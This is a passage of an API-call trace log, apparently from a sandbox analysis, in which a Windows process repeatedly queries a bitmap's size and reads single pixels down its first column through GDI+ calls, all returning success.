[0138.870] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.870] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.870] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=9, color=0x17e6f4) returned 0x0
[0138.870] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.870] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.870] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=10, color=0x17e6f4) returned 0x0
[0138.870] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.870] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.870] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=11, color=0x17e6f4) returned 0x0
[0138.870] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.871] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.871] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=12, color=0x17e6f4) returned 0x0
[0138.871] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.871] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.871] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=13, color=0x17e6f4) returned 0x0
[0138.871] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.871] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.871] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=14, color=0x17e6f4) returned 0x0
[0138.871] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.871] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.871] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=15, color=0x17e6f4) returned 0x0
[0138.872] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.872] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.872] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=16, color=0x17e6f4) returned 0x0
[0138.872] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.872] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.872] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=17, color=0x17e6f4) returned 0x0
[0138.872] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.872] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.872] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=18, color=0x17e6f4) returned 0x0
[0138.873] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.873] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.873] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=19, color=0x17e6f4) returned 0x0
[0138.873] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.873] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.873] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=20, color=0x17e6f4) returned 0x0
[0138.873] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.873] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.873] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=21, color=0x17e6f4) returned 0x0
[0138.874] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.874] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.874] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=22, color=0x17e6f4) returned 0x0
[0138.874] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.874] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.874] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=23, color=0x17e6f4) returned 0x0
[0138.874] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.874] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.874] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=24, color=0x17e6f4) returned 0x0
[0138.874] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.875] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.875] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=25, color=0x17e6f4) returned 0x0
[0138.875] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.875] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.875] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=26, color=0x17e6f4) returned 0x0
[0138.875] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.875] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.875] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=27, color=0x17e6f4) returned 0x0
[0138.875] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.875] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.876] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=28, color=0x17e6f4) returned 0x0
[0138.876] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.876] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.876] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=29, color=0x17e6f4) returned 0x0
[0138.876] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.876] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.876] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=30, color=0x17e6f4) returned 0x0
[0138.876] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.876] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.876] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=31, color=0x17e6f4) returned 0x0
[0138.877] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.877] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.877] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=32, color=0x17e6f4) returned 0x0
[0138.877] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.877] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.877] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=33, color=0x17e6f4) returned 0x0
[0138.877] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.877] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.877] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=34, color=0x17e6f4) returned 0x0
[0138.877] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.877] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.878] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=35, color=0x17e6f4) returned 0x0
[0138.878] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.878] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.878] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=36, color=0x17e6f4) returned 0x0
[0138.878] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.878] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.883] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=37, color=0x17e6f4) returned 0x0
[0138.883] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.883] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.883] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=38, color=0x17e6f4) returned 0x0
[0138.883] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.883] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.883] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=39, color=0x17e6f4) returned 0x0
[0138.883] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.883] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.883] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=40, color=0x17e6f4) returned 0x0
[0138.884] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.884] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.884] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=41, color=0x17e6f4) returned 0x0
[0138.884] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.884] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.884] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=42, color=0x17e6f4) returned 0x0
[0138.884] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.884] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.884] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=43, color=0x17e6f4) returned 0x0
[0138.884] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.884] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.884] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=44, color=0x17e6f4) returned 0x0
[0138.884] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.885] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.885] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=45, color=0x17e6f4) returned 0x0
[0138.885] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.885] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.885] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=46, color=0x17e6f4) returned 0x0
[0138.885] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.885] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.885] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=47, color=0x17e6f4) returned 0x0
[0138.885] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.885] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.885] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=48, color=0x17e6f4) returned 0x0
[0138.885] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.885] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.885] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=49, color=0x17e6f4) returned 0x0
[0138.886] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.886] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.886] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=50, color=0x17e6f4) returned 0x0
[0138.886] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.886] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.886] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=51, color=0x17e6f4) returned 0x0
[0138.886] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.886] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.886] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=52, color=0x17e6f4) returned 0x0
[0138.886] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.886] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.886] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=53, color=0x17e6f4) returned 0x0
[0138.886] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.886] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.886] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=54, color=0x17e6f4) returned 0x0
[0138.887] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.887] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.887] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=55, color=0x17e6f4) returned 0x0
[0138.887] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.887] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.887] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=56, color=0x17e6f4) returned 0x0
[0138.887] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.887] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.887] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=57, color=0x17e6f4) returned 0x0
[0138.887] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.887] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.887] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=58, color=0x17e6f4) returned 0x0
[0138.887] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.887] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.888] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=59, color=0x17e6f4) returned 0x0
[0138.888] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.888] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.888] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=60, color=0x17e6f4) returned 0x0
[0138.888] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.888] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.888] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=61, color=0x17e6f4) returned 0x0
[0138.888] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.888] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.888] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=62, color=0x17e6f4) returned 0x0
[0138.888] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.888] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.888] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=63, color=0x17e6f4) returned 0x0
[0138.888] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.888] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.889] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=64, color=0x17e6f4) returned 0x0
[0138.889] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.889] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.889] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=65, color=0x17e6f4) returned 0x0
[0138.889] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.889] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.889] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=66, color=0x17e6f4) returned 0x0
[0138.889] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.889] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.889] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=67, color=0x17e6f4) returned 0x0
[0138.889] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.889] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.889] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=68, color=0x17e6f4) returned 0x0
[0138.889] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.889] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.890] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=69, color=0x17e6f4) returned 0x0
[0138.890] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.890] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.890] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=70, color=0x17e6f4) returned 0x0
[0138.890] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.890] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.890] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=71, color=0x17e6f4) returned 0x0
[0138.890] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.890] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.890] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=72, color=0x17e6f4) returned 0x0
[0138.890] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.890] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.890] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=73, color=0x17e6f4) returned 0x0
[0138.890] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.890] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.891] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=74, color=0x17e6f4) returned 0x0
[0138.891] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.891] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.891] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=75, color=0x17e6f4) returned 0x0
[0138.891] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.891] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.891] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=76, color=0x17e6f4) returned 0x0
[0138.891] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.891] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.891] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=77, color=0x17e6f4) returned 0x0
[0138.891] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.891] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.891] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=78, color=0x17e6f4) returned 0x0
[0138.891] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.892] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.892] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=79, color=0x17e6f4) returned 0x0
[0138.892] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.892] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.892] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=80, color=0x17e6f4) returned 0x0
[0138.892] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.892] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.892] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=81, color=0x17e6f4) returned 0x0
[0138.892] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.892] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.892] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=82, color=0x17e6f4) returned 0x0
[0138.892] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.892] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.892] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=83, color=0x17e6f4) returned 0x0
[0138.892] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.893] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.893] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=84, color=0x17e6f4) returned 0x0
[0138.893] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.893] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.893] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=85, color=0x17e6f4) returned 0x0
[0138.893] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.893] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.893] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=86, color=0x17e6f4) returned 0x0
[0138.893] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.893] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.893] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=87, color=0x17e6f4) returned 0x0
[0138.893] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.893] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.893] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=88, color=0x17e6f4) returned 0x0
[0138.893] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.893] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.893] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=89, color=0x17e6f4) returned 0x0
[0138.893] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.893] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.894] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=90, color=0x17e6f4) returned 0x0
[0138.894] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.894] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.895] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=91, color=0x17e6f4) returned 0x0
[0138.895] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.895] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.895] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=92, color=0x17e6f4) returned 0x0
[0138.895] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.895] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.895] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=93, color=0x17e6f4) returned 0x0
[0138.895] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.895] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.895] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=94, color=0x17e6f4) returned 0x0
[0138.895] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.895] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.895] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=95, color=0x17e6f4) returned 0x0
[0138.895] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.896] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.896] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=96, color=0x17e6f4) returned 0x0
[0138.896] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.896] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.896] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=97, color=0x17e6f4) returned 0x0
[0138.896] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.896] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.896] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=98, color=0x17e6f4) returned 0x0
[0138.896] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.896] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.896] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=99, color=0x17e6f4) returned 0x0
[0138.896] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.896] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.896] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=100, color=0x17e6f4) returned 0x0
[0138.896] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.897] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.897] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=101, color=0x17e6f4) returned 0x0
[0138.897] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.897] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.897] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=102, color=0x17e6f4) returned 0x0
[0138.897] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.897] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.897] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=103, color=0x17e6f4) returned 0x0
[0138.897] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.897] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.897] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=104, color=0x17e6f4) returned 0x0
[0138.897] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.897] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.897] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=105, color=0x17e6f4) returned 0x0
[0138.898] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.898] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.898] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=106, color=0x17e6f4) returned 0x0
[0138.898] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.898] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.898] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=107, color=0x17e6f4) returned 0x0
[0138.898] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.898] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.898] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=108, color=0x17e6f4) returned 0x0
[0138.898] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.898] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.898] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=109, color=0x17e6f4) returned 0x0
[0138.898] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.898] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.898] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=110, color=0x17e6f4) returned 0x0
[0138.899] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.899] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.899] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=111, color=0x17e6f4) returned 0x0
[0138.899] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.899] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.899] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=112, color=0x17e6f4) returned 0x0
[0138.899] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.899] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.899] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=113, color=0x17e6f4) returned 0x0
[0138.899] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.899] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
